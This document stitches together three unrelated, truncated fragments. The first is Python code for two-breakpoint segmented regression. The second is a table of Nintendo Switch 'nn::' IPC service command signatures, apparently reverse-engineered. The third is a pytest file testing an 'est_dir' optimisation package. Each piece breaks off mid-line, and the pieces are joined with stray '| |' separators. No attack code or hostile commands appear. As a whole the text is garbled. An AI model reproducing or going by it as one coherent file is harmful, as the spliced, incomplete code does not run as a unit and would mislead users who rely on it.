ols_data1, ols_data2, ols_data3 = ols_terms(indep=indep,
dep=dep,
u1=u1,
u2=u2)
rss_term = rss(params=[u1, v1, u2, v2, m1, m2],
ols_data1=ols_data1,
ols_data2=ols_data2,
ols_data3=ols_data3)
num_data = ols_data1[0] + ols_data2[0] + ols_data3[0]
result = likelihood_util.loglikelihood(rss=rss_term,
resid_variance=resid_variance,
num_data=num_data)
return result
def _two_bkpt_loglik2(params, indep, dep):
"""
Different ordering of params.
Parameters
----------
params: list
[u1, u2, v1, v2, m1, m2, residual_variance]
indep: array-like
independent data
dep: array-like
dependent data
"""
u1, u2, v1, v2, m1, m2, resid_variance = params
ols_data1, ols_data2, ols_data3 = ols_terms(indep=indep,
dep=dep,
u1=u1,
u2=u2)
rss_term = rss(params=[u1, v1, u2, v2, m1, m2],
ols_data1=ols_data1,
ols_data2=ols_data2,
ols_data3=ols_data3)
num_data = ols_data1[0] + ols_data2[0] + ols_data3[0]
result = likelihood_util.loglikelihood(rss=rss_term,
resid_variance=resid_variance,
num_data=num_data)
return result
##########################################################################
# End Hessian
##########################################################################
def segmented_func_impl(x, params):
"""
PARAMETERS
----------
x: array-like (non-scalar)
"""
# TODO: REMEMBER THIS FUNCTION GIVES ODD RESULTS WITH INTEGER INPUT
x_arr = np.array(x, dtype=float)
u1, v1, u2, v2, m1, m2 = params
mid_slope = (v2 - v1) / (u2 - u1)
# we sort the data
argsort_inds = x_arr.argsort()
sorted_arr = x_arr[argsort_inds]
first = sorted_arr[sorted_arr <= u1]
second = sorted_arr[np.logical_and(u1 < sorted_arr, sorted_arr <= u2)]
third = sorted_arr[u2 < sorted_arr]
first_vals = v1 + m1 * (first - u1)
second_vals = v1 + mid_slope * (second - u1)
third_vals = v2 + m2 * (third - u2)
# print "IN FUNC"
# print "------------------------"
# print x_arr <= u1
# print "VAL1: ", v1 + m1 * (x_arr - u1)
# print "------------------------"
# print np.logical_and(u1 < x_arr, x_arr <= u2)
# print "VAL2: ", v1 + mid_slope * (x_arr - u1)
# print "------------------------"
# print u2 < x_arr
# print "VAL: ", v2 + m2*(x_arr-u2)
# print
#
# print "first"
# print first
# print "second"
# print second
# print "third"
# print third
# print "first vals"
# print first_vals
# print "second vals"
# print second_vals
# print "third vals"
# print third_vals
sorted_result = np.append(first_vals, second_vals)
sorted_result = np.append(sorted_result, third_vals)
result = sorted_result[argsort_inds]
return result
# TODO: duped: get rid of this impl
def segmented_func(x, params):
if np.isscalar(x):
result = segmented_func_impl([x], params)
return result[0]
else:
return segmented_func_impl(x, params)
# NOTE: bug in numpy? does not work when three or more conditions and input
# is a scalar
def segmented_funcORIG(x, params):
# TODO: REMEMBER THIS FUNCTION GIVES ODD RESULTS WITH INTEGER INPUT
x_arr = np.array(x, dtype=float)
u1, v1, u2, v2, m1, m2 = params
mid_slope = (v2 - v1) / (u2 - u1)
first = x_arr[x_arr <= u1]
print("IN FUNC")
print(u2 < x_arr)
print("VAL: ", v2 + m2 * (x - u2))
print()
return np.piecewise(x_arr,
[x_arr <= u1,
np.logical_and(u1 < x_arr, x_arr <= u2),
u2 < x_arr],
[lambda z: v1 + m1 * (z - u1),
lambda z: v1 + mid_slope * (z - u1),
lambda z: v2 + m2 * (z - u2)])
@jit(nopython=True)
def fixed_bkpt_ls_regression(indep, dep, u1, u2):
"""
Pure python implementation of the main cython impl:
two_bkpt_segreg.fixed_bkpt_least_squares
Segmented function params: (u1,v1,u2,v2,m1,m2), where (u1,v1) and (u2,v2)
are breakpoints, and m1,m2 are the slope of the line segments in regions
1 and 3 (the slope in region 2 being determined)
This implementation uses the regression formula Section 5.1.1 of
"Segmented Regression" by <NAME>. It gives the same answer as
the method fixed_bkpt_ls
"""
index1 = np.searchsorted(indep, u1, side='right')
index2 = np.searchsorted(indep, u2, side='right')
data_shiftu1 = indep - u1
data_shiftu2 = indep - u2
diff = u2 - u1
data0 = 1.0 - np.copy(data_shiftu1) / diff
data0[0:index1] = 1.0
data0[index2:] = 0.0
data1 = np.copy(data_shiftu1) / diff
data1[0:index1] = 0.0
data1[index2:] = 1.0
data2 = np.copy(data_shiftu1)
data2[index1:] = 0.0
data3 = np.copy(data_shiftu2)
data3[0:index2] = 0.0
data = np.vstack((data0, data1, data2, data3))
data = data.T
# matrix mult by hand faster than canned OLS routines
dep = dep.reshape(-1, 1)
v1, v2, m1, m2 = regression_alt.mat_by_hand_ols(data, dep)
return v1, v2, m1, m2
@jit(nopython=True)
def fixed_bkpt_ls_from_data(indep, dep, u1, u2):
"""
"""
index1 = np.searchsorted(indep, u1, side='right')
index2 = np.searchsorted(indep, u2, side='right')
indep1 = indep[0:index1]
dep1 = dep[0:index1]
indep2 = indep[index1:index2]
dep2 = dep[index1:index2]
indep3 = indep[index2:]
dep3 = dep[index2:]
ols_terms_1 = regression_alt.ols_terms(indep1, dep1)
ols_terms_2 = regression_alt.ols_terms(indep2, dep2)
ols_terms_3 = regression_alt.ols_terms(indep3, dep3)
return fixed_bkpt_ls(ols_terms_1, ols_terms_2, ols_terms_3, u1, u2)
@jit(nopython=True, cache=False)
def fixed_bkpt_ls(ols_terms_1, ols_terms_2, ols_terms_3, u1, u2):
"""
Pure python implementation of the main cython impl:
two_bkpt_segreg.fixed_bkpt_least_squares
Segmented function params: (u1,v1,u2,v2,m1,m2), where (u1,v1) and (u2,v2)
are breakpoints, and m1,m2 are the slope of the line segments in regions
1 and 3 (the slope in region 2 being determined)
NOTES
-----
The notation below follows the document
"Segmented Regression" by <NAME>
"""
num_data_1, sum_x_1, sum_y_1, sum_xx_1, sum_yy_1, sum_xy_1 = ols_terms_1
num_data_2, sum_x_2, sum_y_2, sum_xx_2, sum_yy_2, sum_xy_2 = ols_terms_2
num_data_3, sum_x_3, sum_y_3, sum_xx_3, sum_yy_3, sum_xy_3 = ols_terms_3
u1_sq = u1 * u1
u2_sq = u2 * u2
two_u1 = 2.0 * u1
two_u2 = 2.0 * u2
diff = u2 - u1
diff_sq = diff * diff
A1 = sum_y_1
A2 = sum_y_2
A3 = sum_y_3
B11 = sum_xy_1 - u1 * A1
B22 = sum_xy_2 - u2 * A2
B21 = sum_xy_2 - u1 * A2
B32 = sum_xy_3 - u2 * A3
C11 = sum_x_1 - u1 * num_data_1
C21 = sum_x_2 - u1 * num_data_2
C32 = sum_x_3 - u2 * num_data_3
D11 = sum_xx_1 - two_u1 * sum_x_1 + u1_sq * num_data_1
D22 = sum_xx_2 - two_u2 * sum_x_2 + u2_sq * num_data_2
D21 = sum_xx_2 - two_u1 * sum_x_2 + u1_sq * num_data_2
D32 = sum_xx_3 - two_u2 * sum_x_3 + u2_sq * num_data_3
E = sum_yy_1 + sum_yy_2 + sum_yy_3
F2 = sum_xx_2 - (u1 + u2) * sum_x_2 + u1 * u2 * num_data_2
##
term = D21 / diff_sq
a = -num_data_1 + C11 * C11 / D11 - D22 / diff_sq
b = F2 / diff_sq
c = b
d = -num_data_3 + C32 * C32 / D32 - term
e = -A1 + B11 * C11 / D11 + B22 / diff
f = -A3 + B32 * C32 / D32 - B21 / diff
# v estimates
v1, v2 = regression_alt.invert_two_by_two(a, b, c, d, e, f)
## BEGIN: slopes
m1 = (B11 - v1 * C11) / D11
m2 = (B32 - v2 * C32) / D32
## END: slopes
m = (v2 - v1) / (u2 - u1)
two_v1 = 2.0 * v1
two_v2 = 2.0 * v2
rss = (E - two_v1 * (A1 + A2) - two_v2 * A3
- 2.0 * m1 * B11 - 2.0 * m * B21 - 2.0 * m2 * B32
+ v1 * v1 * (num_data_1 + num_data_2) + v2 * v2 * num_data_3
+ two_v1 * (m1 * C11 + m * C21) + two_v2 * m2 * C32
+ m1 * m1 * D11 + m * m * D21 + m2 * m2 * D32)
return v1, v2, m1, m2, rss
@jit(nopython=True, cache=_CACHE_NUMBA)
def estimate_two_bkpt_segreg(indep,
dep,
num_end_to_skip=3,
num_between_to_skip=4,
verbose=False,
optimize=True):
"""
Estimate two-bkpt segmented regression model.
This method is limited to univariate, continuous, linear, | |
bytes out - Buffer<0,5,0>'),
('nn::es::IETicketService', 3, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::es::IETicketService', 4, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::es::IETicketService', 5, '0 bytes in - 0 bytes out'),
('nn::es::IETicketService', 6, '0 bytes in - 0 bytes out'),
('nn::es::IETicketService', 7, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::es::IETicketService', 8, ''),
('nn::es::IETicketService', 9, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::es::IETicketService', 10, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::es::IETicketService', 11, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::es::IETicketService', 12, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::es::IETicketService', 13, ''),
('nn::es::IETicketService', 14, ''),
('nn::es::IETicketService', 15, ''),
('nn::es::IETicketService', 16, ''),
('nn::es::IETicketService', 17, ''),
('nn::es::IETicketService', 18, ''),
('nn::es::IETicketService', 19, ''),
('nn::es::IETicketService', 20, ''),
('nn::es::IETicketService', 21, ''),
('nn::eth::sf::IEthInterface', 0, ''),
('nn::eth::sf::IEthInterface', 1, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterface', 2, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterface', 3, ''),
('nn::eth::sf::IEthInterface', 4, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::eth::sf::IEthInterface', 5, ''),
('nn::eth::sf::IEthInterfaceGroup', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::eth::sf::IEthInterfaceGroup', 1, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterfaceGroup', 2, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterfaceGroup', 3, ''),
('nn::eth::sf::IEthInterfaceGroup', 4, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::eupld::sf::IControl', 0, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::eupld::sf::IControl', 1, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::eupld::sf::IControl', 2, ''),
('nn::eupld::sf::IControl', 3, ''),
('nn::eupld::sf::IRequest', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::eupld::sf::IRequest', 1, '0 bytes in - 0 bytes out'),
('nn::eupld::sf::IRequest', 2, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::eupld::sf::IRequest', 3, '0 bytes in - 0 bytes out - Buffer<0,6,0>'),
('nn::eupld::sf::IRequest', 4, '0 bytes in - 0 bytes out'),
('nn::eupld::sf::IRequest', 5, '0 bytes in - 0 bytes out'),
('nn::fan::detail::IController', 0, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::fan::detail::IController', 1, '4 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<4,4,0>'),
('nn::fan::detail::IController', 2, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fan::detail::IController', 3, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::fan::detail::IController', 4, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fan::detail::IController', 5, '0 bytes in - 0 bytes out'),
('nn::fan::detail::IController', 6, '0 bytes in - 0 bytes out'),
('nn::fan::detail::IController', 7, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fan::detail::IManager', 0, '4 bytes in - 0 bytes out - OutObject<0,0>, InRaw<4,4,0>'),
('nn::fatalsrv::IPrivateService', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::fatalsrv::IService', 0, ''),
('nn::fatalsrv::IService', 1, ''),
('nn::fatalsrv::IService', 2, ''),
('nn::fgm::sf::IDebugger', 0, '8 bytes in - 0 bytes out - OutHandle<0,1>, InHandle<0,1>, InRaw<8,8,0>'),
('nn::fgm::sf::IDebugger', 1, '0 bytes in - 0xC bytes out - Buffer<0,6,0>, OutRaw<4,4,0>, OutRaw<4,4,4>, OutRaw<4,4,8>'),
('nn::fgm::sf::IDebugger', 2, '0 bytes in - 0 bytes out'),
('nn::fgm::sf::IRequest', 0, '0x10 bytes in - 0 bytes out - takes pid - OutHandle<0,1>, InRaw<4,4,0>, InRaw<8,8,8>'),
('nn::fgm::sf::IRequest', 1, '8 bytes in - 0 bytes out - InRaw<4,4,0>, InRaw<4,4,4>'),
('nn::fgm::sf::IRequest', 2, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fgm::sf::IRequest', 3, '0 bytes in - 0 bytes out'),
('nn::fgm::sf::ISession', 0, '0 bytes in - 0 bytes out - OutObject<0,0>'),
('nn::friends::detail::ipc::IFriendService', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::friends::detail::ipc::IFriendService', 1, '0 bytes in - 0 bytes out'),
('nn::friends::detail::ipc::IFriendService', 10100, '0x30 bytes in - 4 bytes out - takes pid - OutRaw<4,4,0>, Buffer<0,0xA,0>, InRaw<0x10,8,8>, InRaw<4,4,0>, InRaw<0x10,8,0x18>, InRaw<8,8,0x28>'),
('nn::friends::detail::ipc::IFriendService', 10101, '0x30 bytes in - 4 bytes out - takes pid - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>, InRaw<0x10,8,0x18>, InRaw<8,8,0x28>'),
('nn::friends::detail::ipc::IFriendService', 10102, '0x18 bytes in - 0 bytes out - takes pid - Buffer<0,6,0>, InRaw<0x10,8,0>, Buffer<1,9,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 10110, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<0x10,8,0>, InRaw<8,8,0x10>, Buffer<0,6,0>'),
('nn::friends::detail::ipc::IFriendService', 10200, '0x20 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0>, InRaw<8,8,0x10>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>, InRaw<8,8,0x18>'),
('nn::friends::detail::ipc::IFriendService', 10211, '0x80 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0x68>, InRaw<0x40,1,0>, InRaw<0x21,1,0x40>, Buffer<2,5,0>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>, InRaw<8,8,0x78>'),
('nn::friends::detail::ipc::IFriendService', 10400, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,0xA,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 10500, '0x10 bytes in - 0 bytes out - Buffer<0,6,0>, InRaw<0x10,8,0>, Buffer<1,9,0>'),
('nn::friends::detail::ipc::IFriendService', 10600, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 10601, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 10610, '0x18 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0>, Buffer<0,0x19,0xE0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 10700, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x40>, InRaw<0x10,8,8>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 10701, '0x10 bytes in - 0 bytes out - Buffer<0,0x1A,0x40>, InRaw<8,8,8>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 10702, '0x18 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0>, Buffer<0,0x19,0x40>, Buffer<1,0x19,0x48>, Buffer<2,0x19,0x48>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 11000, '0xA4 bytes in - 0xA0 bytes out - OutRaw<0xA0,1,0>, InRaw<0xA0,1,0>, InRaw<4,4,0xA0>'),
('nn::friends::detail::ipc::IFriendService', 20100, '0x28 bytes in - 4 bytes out - takes pid - OutRaw<4,4,0>, InRaw<0x10,8,0>, InRaw<0x10,8,0x10>, InRaw<8,8,0x20>'),
('nn::friends::detail::ipc::IFriendService', 20101, '0x10 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20102, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x800>, InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 20103, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20104, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20110, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x40>, InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 20200, '0x10 bytes in - 8 bytes out - OutRaw<4,4,0>, OutRaw<4,4,4>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20201, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>, InRaw<4,4,4>'),
('nn::friends::detail::ipc::IFriendService', 20300, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20301, '0x18 bytes in - 4 bytes out - Buffer<0,0x1A,0x38>, OutRaw<4,4,0>, Buffer<1,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20400, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20401, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20500, '0x10 bytes in - 0 bytes out - Buffer<0,6,0>, InRaw<0x10,8,0>, Buffer<1,9,0>'),
('nn::friends::detail::ipc::IFriendService', 20501, '0x18 bytes in - 8 bytes out - OutRaw<8,1,0>, InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 20600, '0x10 bytes in - 0 bytes out - Buffer<0,0x1A,0xE0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20700, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20701, '0x10 bytes in - 0x10 bytes out - OutRaw<0x10,8,0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20800, '0x10 bytes in - 0 bytes out - Buffer<0,0x1A,0x800>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20801, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20900, '0 bytes in - 0 bytes out'),
('nn::friends::detail::ipc::IFriendService', 21000, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x4B8>, InRaw<0x10,8,8>, InRaw<8,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30100, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30101, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30110, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30120, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30121, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30200, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30201, '0x30 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>, InRaw<0x10,8,0x20>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::friends::detail::ipc::IFriendService', 30202, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30203, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30204, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30205, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30210, '0x10 bytes in - 0x40 bytes out - OutRaw<0x40,1,0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30211, '0x78 bytes in - 0 bytes out - InRaw<0x10,8,0x68>, InRaw<0x40,1,0>, InRaw<0x21,1,0x40>, Buffer<0,5,0>'),
('nn::friends::detail::ipc::IFriendService', 30212, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30213, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<0x10,8,0>, InRaw<8,8,0x10>, Buffer<0,6,0>'),
('nn::friends::detail::ipc::IFriendService', 30214, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,9,0>, Buffer<1,6,0>'),
('nn::friends::detail::ipc::IFriendService', 30215, '0x30 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>, InRaw<0x10,8,0x20>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::friends::detail::ipc::IFriendService', 30216, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30217, '0x80 bytes in - 0 bytes out - InRaw<0x10,8,0x68>, InRaw<8,8,0x78>, InRaw<4,4,0x60>, InRaw<0x20,1,0>, InRaw<0x10,1,0x20>, InRaw<0x20,1,0x30>, InRaw<0x10,1,0x50>'),
('nn::friends::detail::ipc::IFriendService', 30400, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30401, '0x30 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>, InRaw<0x10,8,0x20>, Buffer<0,0x19,0x48>'),
('nn::friends::detail::ipc::IFriendService', 30402, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30500, '0x30 bytes in - 0 bytes out - Buffer<0,0x1A,0x400>, InRaw<0x10,8,0x20>, InRaw<0x20,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30700, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30810, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30811, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30812, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30820, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30830, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 49900, '0x10 bytes in - 0 bytes out - | |
<gh_stars>0
import numpy as np
import pytest
import est_dir
def test_1():
"""
Test for num_exp_SNR_LS().
"""
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
function_type = 'quad'
m = 100
lambda_max = 1
noise_list = np.array([1, 2])
region = 0.1
num_funcs = 5
cov = np.identity(m)
(sp_norms, sp_func_vals,
fp_norms, fp_func_vals,
sp_func_vals_noise,
fp_func_vals_noise,
time_taken, func_evals_step,
func_evals_dir, no_its,
good_dir_no_its_prop,
good_dir_norm,
good_dir_func) = est_dir.num_exp_SNR_LS(f, f_no_noise, m, num_funcs,
lambda_max, cov, noise_list,
region, function_type)
assert(np.all(sp_norms > 0))
assert(np.all(sp_func_vals > 0))
assert(np.all(fp_norms > 0))
assert(np.all(fp_func_vals > 0))
assert(np.all(func_evals_step >= 0))
assert(np.all(func_evals_dir > 0))
assert(np.all(time_taken > 0))
assert(np.all(no_its > 0))
assert(np.where(fp_norms[0] == fp_norms[1])[0].shape[0] != num_funcs)
assert(np.where(fp_func_vals[0] == fp_func_vals[1])[0].shape[0] !=
num_funcs)
assert(np.where(func_evals_step[0] == func_evals_step[1])[0].shape[0] !=
num_funcs)
assert(np.where(func_evals_dir[0] == func_evals_dir[1])[0].shape[0] !=
num_funcs)
assert(np.where(good_dir_norm[0] == good_dir_norm[1])[0].shape[0] !=
num_funcs)
assert(np.where(good_dir_func[0] == good_dir_func[1])[0].shape[0] !=
num_funcs)
assert(np.where(time_taken[0] == time_taken[1])[0].shape[0] !=
num_funcs)
assert(np.all(sp_norms[0] == sp_norms[1]))
assert(np.all(sp_func_vals[0] == sp_func_vals[1]))
test_sp_norms = np.zeros((noise_list.shape[0], num_funcs))
test_fp_norms = np.zeros((noise_list.shape[0], num_funcs))
test_sp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
test_fp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
test_sp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
test_fp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
test_time_taken = np.zeros((noise_list.shape[0], num_funcs))
test_func_evals_step = np.zeros((noise_list.shape[0], num_funcs))
test_func_evals_dir = np.zeros((noise_list.shape[0], num_funcs))
test_no_its = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_no_its_prop = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_norm = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_func = np.zeros((noise_list.shape[0], num_funcs))
for index_noise in range(noise_list.shape[0]):
for j in range(num_funcs):
noise_sd = noise_list[index_noise]
seed = j * 50
np.random.seed(seed)
centre_point = np.random.multivariate_normal(np.zeros((m)), cov)
minimizer = np.zeros((m, ))
matrix = est_dir.quad_func_params(1, lambda_max, m)
test_sp_norms[index_noise, j] = np.linalg.norm(minimizer -
centre_point)
test_sp_func_vals[index_noise, j] = est_dir.quad_f(centre_point,
minimizer,
matrix)
func_args = (minimizer, matrix, 0, noise_sd)
func_args_no_noise = (minimizer, matrix)
np.random.seed(seed + 1)
(upd_point_LS,
test_sp_func_vals_noise[index_noise, j],
test_fp_func_vals_noise[index_noise, j],
test_time_taken[index_noise, j],
test_func_evals_step[index_noise, j],
test_func_evals_dir[index_noise, j],
test_no_its[index_noise, j],
store_good_dir,
store_good_dir_norm,
store_good_dir_func) = (est_dir.calc_its_until_sc_LS(
centre_point, f, func_args, m,
f_no_noise, func_args_no_noise,
region))
test_fp_norms[index_noise, j] = np.linalg.norm(minimizer -
upd_point_LS)
test_fp_func_vals[index_noise, j] = est_dir.quad_f(upd_point_LS,
minimizer,
matrix)
test_good_dir_no_its_prop[index_noise, j] = store_good_dir
if len(store_good_dir_norm) > 0:
test_good_dir_norm[index_noise,
j] = np.mean(store_good_dir_norm)
test_good_dir_func[index_noise,
j] = np.mean(store_good_dir_func)
assert(np.all(test_sp_norms == sp_norms))
assert(np.all(test_sp_func_vals == sp_func_vals))
assert(np.all(test_sp_func_vals_noise == sp_func_vals_noise))
assert(np.all(test_fp_func_vals_noise == fp_func_vals_noise))
assert(np.all(test_func_evals_step == func_evals_step))
assert(np.all(test_func_evals_dir == func_evals_dir))
assert(np.all(test_fp_norms == fp_norms))
assert(np.all(test_fp_func_vals == fp_func_vals))
assert(np.all(test_good_dir_no_its_prop == good_dir_no_its_prop))
assert(np.all(test_good_dir_norm == good_dir_norm))
assert(np.all(test_good_dir_func == good_dir_func))
def test_2():
"""
Test for num_exp_SNR_XY().
"""
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
function_type = 'quad'
m = 100
n = 16
lambda_max = 1
noise_list = np.array([1, 2])
max_func_evals_list = np.array([2000, 2000])
no_vars = m
region = 0.1
num_funcs = 5
store_max_func_evals = max_func_evals_list[0]
cov = np.identity(m)
(sp_norms, sp_func_vals,
fp_norms, fp_func_vals,
sp_func_vals_noise,
fp_func_vals_noise,
time_taken, func_evals_step,
func_evals_dir, no_its,
good_dir_no_its_prop,
good_dir_norm,
good_dir_func) = est_dir.num_exp_SNR_XY(f, f_no_noise, n, m, num_funcs,
lambda_max, cov, noise_list,
no_vars, region,
max_func_evals_list,
function_type,
store_max_func_evals)
assert(np.all(sp_norms > 0))
assert(np.all(sp_func_vals > 0))
assert(np.all(fp_norms > 0))
assert(np.all(fp_func_vals > 0))
assert(np.all(func_evals_step > 0))
assert(np.all(func_evals_dir > 0))
assert(np.all(time_taken > 0))
assert(np.all(no_its > 0))
